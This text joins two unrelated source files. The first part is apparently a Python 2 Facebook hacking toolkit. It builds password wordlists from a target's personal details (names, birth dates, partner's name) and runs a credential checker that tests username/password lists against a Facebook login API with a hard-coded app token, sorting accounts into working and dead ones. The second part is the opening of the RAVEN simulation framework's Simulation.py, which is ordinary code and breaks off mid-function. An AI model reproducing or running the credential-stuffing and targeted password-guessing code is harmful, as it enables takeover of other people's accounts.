print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
Simulation.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that contains the driver for the whole simulation flow (Simulation Class)
"""
import xml.etree.ElementTree as ET
import os,subprocess
import sys
import io
import string
import datetime
import numpy as np
import threading
import MessageHandler # this needs to happen early to instantiate message handler
from BaseClasses import MessageUser
import Steps
import DataObjects
import Files
import Samplers
import Optimizers
import Models
import Metrics
import Distributions
import Databases
import Functions
import OutStreams
from JobHandler import JobHandler
from utils import utils, TreeStructure, xmlUtils, mathUtils
import Decorators
from Application import __QtAvailable
from Interaction import Interaction
if __QtAvailable:
from Application import InteractiveApplication
# Load up plugins!
# -> only available on specially-marked base types
Models.Model.loadFromPlugins()
#----------------------------------------------------------------------------------------------------
class SimulationMode(MessageUser):
"""
    SimulationMode allows changes to how the simulation
    runs are done. modifyInfo lets the mode change runInfoDict
    and other parameters. remoteRunCommand lets a command to run RAVEN
remotely be specified.
"""
def __init__(self, *args):
"""
Constructor
@ In, args, list, unused positional arguments
@ Out, None
"""
super().__init__()
self.printTag = 'SIMULATION MODE'
def remoteRunCommand(self, runInfoDict):
"""
If this returns None, do nothing. If it returns a dictionary,
use the dictionary to run raven remotely.
@ In, runInfoDict, dict, the run info
@ Out, remoteRunCommand, dict, the information for the remote command.
      The dictionary should have an "args" key that is used as a command for
      a subprocess.call. It optionally can have a "cwd" key for the current
      working directory and an "env" key for the environment to use for the command.
"""
return None
def modifyInfo(self, runInfoDict):
"""
      modifyInfo is called after the runInfoDict has been set up.
      This allows the mode to change any parameters that need changing.
      This typically modifies the precommand and the postcommand that
      are put in front of the command and after the command.
      @ In, runInfoDict, dict, the run info
      @ Out, newRunInfo, dict, dictionary of modifications to apply; if empty, no changes are made
"""
import multiprocessing
newRunInfo = {}
try:
if multiprocessing.cpu_count() < runInfoDict['batchSize']:
self.raiseAWarning("cpu_count",multiprocessing.cpu_count(),"< batchSize",runInfoDict['batchSize'])
except NotImplementedError:
pass
if runInfoDict['NumThreads'] > 1:
newRunInfo['threadParameter'] = runInfoDict['threadParameter']
#add number of threads to the post command.
newRunInfo['postcommand'] =" {} {}".format(newRunInfo['threadParameter'],runInfoDict['postcommand'])
return newRunInfo
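  # Illustrative sketch only (assumed example values, not taken from the original source):
  # with a runInfoDict containing NumThreads=4, postcommand='' and the default
  # threadParameter '--n-threads=%NUM_CPUS%', modifyInfo would return
  #   {'threadParameter': '--n-threads=%NUM_CPUS%',
  #    'postcommand': ' --n-threads=%NUM_CPUS% '}
  # where the %NUM_CPUS% wildcard is substituted elsewhere by the framework.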
def XMLread(self,xmlNode):
"""
XMLread is called with the mode node, and can be used to
get extra parameters needed for the simulation mode.
@ In, xmlNode, xml.etree.ElementTree.Element, the xml node that belongs to this class instance
@ Out, None
"""
pass
#Note that this has to be after SimulationMode is defined or the CustomModes
#don't see SimulationMode when they import Simulation
import CustomModes
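# Illustrative sketch only (hypothetical subclass, not part of the original module):
# custom modes typically subclass SimulationMode and override modifyInfo, e.g.
#
#   class SingleRunMode(SimulationMode):
#     def modifyInfo(self, runInfoDict):
#       # force serial execution; using the 'batchSize' key is an assumption here
#       return {'batchSize': 1}
#
# The concrete, supported modes are provided by the CustomModes module imported above.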
def splitCommand(s):
"""
Splits the string s into a list that can be used for the command
So for example splitCommand("ab bc c 'el f' \"bar foo\" ") ->
['ab', 'bc', 'c', 'el f', 'bar foo']
Bugs: Does not handle quoted strings with different kinds of quotes
@ In, s, string, the command to split
    @ Out, retList, list, the list of split command tokens
"""
n = 0
retList = []
inQuote = False
buffer = ""
while n < len(s):
current = s[n]
if current in string.whitespace and not inQuote:
if len(buffer) > 0:
#found end of command
retList.append(buffer)
buffer = ""
elif current in "\"'":
if inQuote:
inQuote = False
else:
inQuote = True
else:
buffer = buffer + current
n += 1
if len(buffer) > 0:
retList.append(buffer)
return retList
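# Illustrative usage only (hypothetical command string, not from the original source):
#   splitCommand('mpiexec -n 4 "my program" arg')
#   -> ['mpiexec', '-n', '4', 'my program', 'arg']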
#----------------------------------------------------------------------
#
#
#
#-----------------------------------------------------------------------------------------------------
class Simulation(MessageUser):
"""
    This is a class that contains all the objects needed to run the simulation
Usage:
myInstance = Simulation() !Generate the instance
    myInstance.XMLread(xml.etree.ElementTree.Element) !This method generates all the objects living in the simulation
myInstance.initialize() !This method takes care of setting up the directory/file environment with proper checks
    myInstance.run() !This method runs the simulation
Utility methods:
myInstance.printDicts !prints the dictionaries representing the whole simulation
    myInstance.setInputFiles !re-associates the set of files owned by the simulation
    myInstance.getDefaultInputFile !returns the default name of the input file read by the simulation
Inherited from the BaseType class:
myInstance.whoAreYou() !inherited from BaseType class-
myInstance.myClassmyCurrentSetting() !see BaseType class-
--how to add a new entity <myClass> to the simulation--
Add an import for the module where it is defined. Convention is that the module is named with the plural
of the base class of the module: <MyModule>=<myClass>+'s'.
The base class of the module is by convention named as the new type of simulation component <myClass>.
The module should contain a set of classes named <myType> that are child of the base class <myClass>.
The module should possess a function <MyModule>.factory.returnInstance('<myType>') that returns a pointer to the class <myType>.
Add in Simulation.__init__ the following
self.<myClass>Dict = {}
self.entityModules['<myClass>'] = <MyModule>
self.entities['<myClass>' ] = self.<myClass>Dict
The XML describing the new entity should be organized as it follows:
<MyModule (camelback with first letter capital)>
<MyType (camelback with first letter capital) name='here a user given name' subType='here additional specialization'>
<if needed more xml nodes>
</MyType>
</MyModule>
--Comments on the simulation environment--
every type of element living in the simulation should be uniquely identified by type and name not by sub-type
!!!!Wrong!!!!!!!!!!!!!!!!:
Class: distribution, type: normal, name: myDistribution
Class: distribution, type: triangular, name: myDistribution
Correct:
Class: distribution, type: normal, name: myNormalDist
Class: distribution, type: triangular, name: myTriDist
Using the 'type' attribute in the xml node <MyType> is discouraged, to avoid confusion
"""
def __init__(self, frameworkDir, verbosity='all', interactive=Interaction.No):
"""
Constructor
@ In, frameworkDir, string, absolute path to framework directory
@ In, verbosity, string, optional, general verbosity level
@ In, interactive, Interaction, optional, toggles the ability to provide
an interactive UI or to run to completion without human interaction
@ Out, None
"""
super().__init__()
self.FIXME = False
#set the numpy print threshold to avoid ellipses in array truncation
np.set_printoptions(threshold=np.inf)
self.verbosity = verbosity
callerLength = 25
tagLength = 15
suppressErrs = False
self.messageHandler.initialize({'verbosity':self.verbosity,
'callerLength':callerLength,
'tagLength':tagLength,
'suppressErrs':suppressErrs})
readtime = datetime.datetime.fromtimestamp(self.messageHandler.starttime).strftime('%Y-%m-%d %H:%M:%S')
sys.path.append(os.getcwd())
#this dictionary contains the general info to run the simulation
self.runInfoDict = {}
self.runInfoDict['DefaultInputFile' ] = 'test.xml' #Default input file to use
self.runInfoDict['SimulationFiles' ] = [] #the xml input file
self.runInfoDict['ScriptDir' ] = os.path.join(os.path.dirname(frameworkDir),"scripts") # the location of the pbs script interfaces
self.runInfoDict['FrameworkDir' ] = frameworkDir # the directory where the framework is located
self.runInfoDict['RemoteRunCommand' ] = os.path.join(frameworkDir,'raven_qsub_command.sh')
self.runInfoDict['NodeParameter' ] = '-f' # the parameter used to specify the files where the nodes are listed
self.runInfoDict['MPIExec' ] = 'mpiexec' # the command used to run mpi commands
self.runInfoDict['threadParameter'] = '--n-threads=%NUM_CPUS%'# the command used to run multi-threading commands.
# The "%NUM_CPUS%" is a wildcard to replace. In this way for commands
# that require the num of threads to be inputted without a
# blank space we can have something like --my-nthreads=%NUM_CPUS%
# (e.g. --my-nthreads=10), otherwise we can have something like
# -omp %NUM_CPUS% (e.g. -omp 10). If not present, a blank
# space is always added (e.g. --mycommand => --mycommand 10)
self.runInfoDict['includeDashboard' ] = False # in case internalParallel is True, instantiate the Ray dashboard (https://docs.ray.io/en/master/ray-dashboard.html)? Default: False
self.runInfoDict['WorkingDir' ] = '' # the directory where the framework should be running
self.runInfoDict['TempWorkingDir' ] = '' # the temporary directory where a simulation step is run
self.runInfoDict['NumMPI' ] = 1 # the number of mpi process by run
self.runInfoDict['NumThreads' ] = 1 # Number of Threads by run
self.runInfoDict['numProcByRun' ] = 1 # Total number of core used by one run (number of threads by number of mpi)
self.runInfoDict['batchSize' ] = 1 # number of contemporaneous runs
self.runInfoDict['internalParallel' ] = False # activate internal parallel (parallel python). If True parallel python is used, otherwise multi-threading is used
self.runInfoDict['ParallelCommand' ] = '' # the command that should be used to submit jobs in parallel (mpi)
self.runInfoDict['ThreadingCommand' ] = '' # the command that should be used to submit multi-threaded runs
self.runInfoDict['totalNumCoresUsed' ] = 1 # total number of cores used by driver
self.runInfoDict['queueingSoftware' ] = '' # queueing software name
self.runInfoDict['stepName' ] = '' # the name of the step currently running
self.runInfoDict['precommand' ] = '' # Add to the front of the command that is run
self.runInfoDict['postcommand' ] = '' # Added after the command that is run.
self.runInfoDict['delSucLogFiles' ] = False # If a simulation (code run) has not failed, delete the relative log file (if True)
self.runInfoDict['deleteOutExtension'] = [] # If a simulation (code run) has not failed, delete the relative output files with the listed extension (comma separated list, for example: 'e,r,txt')
self.runInfoDict['mode' ] = '' # Running mode. Currently the only mode supported is mpi but others can be added with custom modes.
self.runInfoDict['Nodes' ] = [] # List of node IDs. Filled only in case RAVEN is run in a DMP machine
self.runInfoDict['expectedTime' ] = '10:00:00' # How long the complete input is expected to run.
self.runInfoDict['logfileBuffer' ] = int(io.DEFAULT_BUFFER_SIZE)*50 # logfile buffer size in bytes
self.runInfoDict['clusterParameters' ] = [] # Extra parameters to use with the qsub command.
self.runInfoDict['maxQueueSize' ] = None
#The following is a set of dictionaries that, in a manner consistent with their names, collect the instances of all objects needed in the simulation
#Their keywords are the user-given names of data, samplers, etc.
#The value corresponding to a keyword is the instance of the corresponding class
self.stepsDict = {}
self.dataDict = {}
self.samplersDict = {}
self.modelsDict = {}
self.distributionsDict = {}
self.dataBasesDict = {}
self.functionsDict = {}
self.filesDict = {} # for each file returns an instance of a Files class
self.metricsDict = {}
self.outStreamsDict = {}
self.stepSequenceList = [] #the list of step of the simulation
#list of supported queue-ing software:
self.knownQueueingSoftware = []
self.knownQueueingSoftware.append('None')
self.knownQueueingSoftware.append('PBS Professional')
#Dictionary of mode handlers for the available run modes
self.__modeHandlerDict = CustomModes.modeHandlers
#self.__modeHandlerDict['mpi'] = CustomModes.MPISimulationMode
#self.__modeHandlerDict['mpilegacy'] = CustomModes.MPILegacySimulationMode
#this dictionary contain the static factory that return the instance of one of the allowed entities in the simulation
#the keywords are the name of the module that contains the specialization of that specific entity
self.entityModules = {}
self.entityModules['Steps' ] = Steps
self.entityModules['DataObjects' ] = DataObjects
self.entityModules['Samplers' ] = Samplers
self.entityModules['Optimizers' ] = Optimizers
self.entityModules['Models' ] = Models
self.entityModules['Distributions' ] = Distributions
self.entityModules['Databases' ] = Databases
self.entityModules['Functions' ] = Functions
self.entityModules['Files' ] = Files
self.entityModules['Metrics' ] = Metrics
self.entityModules['OutStreams' ] = OutStreams
#Mapping between an entity type and the dictionary containing the instances for the simulation
self.entities = {}
self.entities['Steps' ] = self.stepsDict
self.entities['DataObjects' ] = self.dataDict
self.entities['Samplers' ] = self.samplersDict
self.entities['Optimizers' ] = self.samplersDict
self.entities['Models' ] = self.modelsDict
self.entities['RunInfo' ] = self.runInfoDict
self.entities['Files' ] = self.filesDict
self.entities['Distributions' ] = self.distributionsDict
self.entities['Databases' ] = self.dataBasesDict
self.entities['Functions' ] = self.functionsDict
self.entities['Metrics' ] = self.metricsDict
self.entities['OutStreams' ] = self.outStreamsDict
# The QApplication
## The benefit of this enumerated type is that anything other than
## Interaction.No will evaluate to true here and correctly make the
## interactive app.
if interactive:
self.app = InteractiveApplication([], interactive)
else:
self.app = None
#the handler of the runs within each step
self.jobHandler = JobHandler()
#handle the setting of how the jobHandler act
self.__modeHandler = SimulationMode(self)
self.printTag = 'SIMULATION'
self.raiseAMessage('Simulation started at',readtime,verbosity='silent')
self.pollingThread = threading.Thread(target=self.jobHandler.startLoop)
## This allows RAVEN to exit when the only thing left is the JobHandler
## This should no longer be necessary since the jobHandler now has an off
## switch that this object can flip when it is complete, however, if
## simulation fails before it is finished, we should probably still ensure
## that this thread is killed as well, so maybe it is best to keep it for
## now.
self.pollingThread.daemon = True
self.pollingThread.start()
@Decorators.timingProfile
def setInputFiles(self,inputFiles):
"""
Method that can be used to set the input files that the program received.
These are currently used for cluster running where the program
needs to be restarted on a different node.
@ In, inputFiles, list, input files list
@ Out, None
"""
self.runInfoDict['SimulationFiles' ] = inputFiles
def getDefaultInputFile(self):
"""
Returns the default input file to read
@ In, None
@ Out, defaultInputFile, string, default input file
"""
defaultInputFile = self.runInfoDict['DefaultInputFile']
return defaultInputFile
def __createAbsPath(self,fileIn):
"""
Assuming that the file is already in self.filesDict, prepend the working directory so its stored location is an absolute path
@ In, fileIn, string, the file name that needs to be made "absolute"
@ Out, None
"""
curfile = self.filesDict[fileIn]
path = os.path.normpath(self.runInfoDict['WorkingDir'])
curfile.prependPath(path) #this respects existing path from the user input, if any
def XMLpreprocess(self,node,cwd):
"""
Preprocess the input file, load external xml files into the main ET
@ In, node, TreeStructure.InputNode, element of RAVEN input file
@ In, cwd, string, current working directory (for relative path searches)
@ Out, None
"""
xmlUtils.expandExternalXML(node,cwd)
def XMLread(self,xmlNode,runInfoSkip = set(),xmlFilename=None):
"""
parses the xml input file and instantiates the classes needed to represent all objects in the simulation
@ In, xmlNode, ElementTree.Element, xml node to read in
@ In, runInfoSkip, set, optional, nodes to skip
@ In, xmlFilename, string, optional, xml filename for relative directory
@ Out, None
"""
self.raiseADebug("Reading XML", xmlFilename)
#TODO update syntax to note that we read InputTrees not XmlTrees
unknownAttribs = utils.checkIfUnknowElementsinList(['printTimeStamps','verbosity','color','profile'],list(xmlNode.attrib.keys()))
if len(unknownAttribs) > 0:
errorMsg = 'The following attributes are unknown:'
for element in unknownAttribs:
errorMsg += ' ' + element
self.raiseAnError(IOError,errorMsg)
self.verbosity = xmlNode.attrib.get('verbosity','all').lower()
if 'printTimeStamps' in xmlNode.attrib.keys():
self.raiseADebug('Setting "printTimeStamps" to',xmlNode.attrib['printTimeStamps'])
self.messageHandler.setTimePrint(xmlNode.attrib['printTimeStamps'])
if 'color' in xmlNode.attrib.keys():
self.raiseADebug('Setting color output mode to',xmlNode.attrib['color'])
self.messageHandler.setColor(xmlNode.attrib['color'])
if 'profile' in xmlNode.attrib.keys():
thingsToProfile = list(p.strip().lower() for p in xmlNode.attrib['profile'].split(','))
if 'jobs' in thingsToProfile:
self.jobHandler.setProfileJobs(True)
self.messageHandler.verbosity = self.verbosity
runInfoNode = xmlNode.find('RunInfo')
if runInfoNode is None:
self.raiseAnError(IOError,'The RunInfo node is missing!')
self.__readRunInfo(runInfoNode,runInfoSkip,xmlFilename)
### expand variable groups before continuing ###
## build variable groups ##
varGroupNode = xmlNode.find('VariableGroups')
# init, read XML for variable groups
if varGroupNode is not None:
varGroups = mathUtils.readVariableGroups(varGroupNode)
else:
varGroups={}
# read other nodes
for child in xmlNode:
if child.tag == 'VariableGroups':
continue #we did these before the for loop
xmlUtils.replaceVariableGroups(child, varGroups)
if child.tag in self.entities:
className = child.tag
# we already took care of RunInfo block
if className in ['RunInfo']:
continue
self.raiseADebug('-'*2+' Reading the block: {0:15}'.format(str(child.tag))+2*'-')
if len(child.attrib) == 0:
globalAttributes = {}
else:
globalAttributes = child.attrib
module = self.entityModules[className]
if module.factory.returnInputParameter:
paramInput = module.returnInputParameter()
paramInput.parseNode(child)
for childChild in paramInput.subparts:
childName = childChild.getName()
entity = module.factory.returnInstance(childName)
entity.applyRunInfo(self.runInfoDict)
entity.handleInput(childChild, globalAttributes=globalAttributes)
name = entity.name
self.entities[className][name] = entity
else:
for childChild in child:
kind, name, entity = module.factory.instanceFromXML(childChild)
self.raiseADebug(f'Reading class "{kind}" named "{name}" ...')
#place the instance in the proper dictionary (self.entities[Type]) under its name as key,
#the type is the general class (sampler, data, etc.) while childChild.tag is the sub type
if name in self.entities[className]:
self.raiseAnError(IOError, f'Two objects of class "{className}" have the same name "{name}"!')
self.entities[className][name] = entity
entity.applyRunInfo(self.runInfoDict)
entity.readXML(childChild, varGroups, globalAttributes=globalAttributes)
else:
#tag not in entities, check if it's a documentation tag
if child.tag not in ['TestInfo']:
self.raiseAnError(IOError,'<'+child.tag+'> is not among the known simulation components '+repr(child))
# If requested, duplicate input
# ###NOTE: All substitutions to the XML input tree should be done BEFORE this point!!
if self.runInfoDict.get('printInput',False):
fileName = os.path.join(self.runInfoDict['WorkingDir'],self.runInfoDict['printInput'])
self.raiseAMessage('Writing duplicate input file:',fileName)
outFile = open(fileName,'w')
outFile.writelines(utils.toString(TreeStructure.tostring(xmlNode))+'\n') #\n for no-end-of-line issue
outFile.close()
if not set(self.stepSequenceList).issubset(set(self.stepsDict.keys())):
self.raiseAnError(IOError,'The step list: '+str(self.stepSequenceList)+' contains steps that have not been declared: '+str(list(self.stepsDict.keys())))
def initialize(self):
"""
Method to initialize the simulation.
Check/created working directory, check/set up the parallel environment, call step consistency checker
@ In, None
@ Out, None
"""
#move the full simulation environment in the working directory
self.raiseADebug('Moving to working directory:',self.runInfoDict['WorkingDir'])
os.chdir(self.runInfoDict['WorkingDir'])
#add also the new working dir to the path
sys.path.append(os.getcwd())
# clear the raven status file, if any
self.clearStatusFile()
#check consistency and fill the missing info for the // runs (threading, mpi, batches)
self.runInfoDict['numProcByRun'] = self.runInfoDict['NumMPI']*self.runInfoDict['NumThreads']
oldTotalNumCoresUsed = self.runInfoDict['totalNumCoresUsed']
self.runInfoDict['totalNumCoresUsed'] = self.runInfoDict['numProcByRun']*self.runInfoDict['batchSize']
if self.runInfoDict['totalNumCoresUsed'] < oldTotalNumCoresUsed:
#This is used to reserve some cores
self.runInfoDict['totalNumCoresUsed'] = oldTotalNumCoresUsed
elif oldTotalNumCoresUsed > 1:
#If 1, probably just default
self.raiseAWarning("overriding totalNumCoresUsed",oldTotalNumCoresUsed,"to", self.runInfoDict['totalNumCoresUsed'])
#transform all files in absolute path
for key in self.filesDict.keys():
self.__createAbsPath(key)
#Let the mode handler do any modification here
newRunInfo = self.__modeHandler.modifyInfo(dict(self.runInfoDict))
for key in newRunInfo:
#Copy in all the new keys
self.runInfoDict[key] = newRunInfo[key]
self.jobHandler.applyRunInfo(self.runInfoDict)
self.jobHandler.initialize()
# only print the dictionaries when the verbosity is set to debug
#if self.verbosity == 'debug': self.printDicts()
for stepName, stepInstance in self.stepsDict.items():
self.checkStep(stepInstance,stepName)
def checkStep(self,stepInstance,stepName):
"""
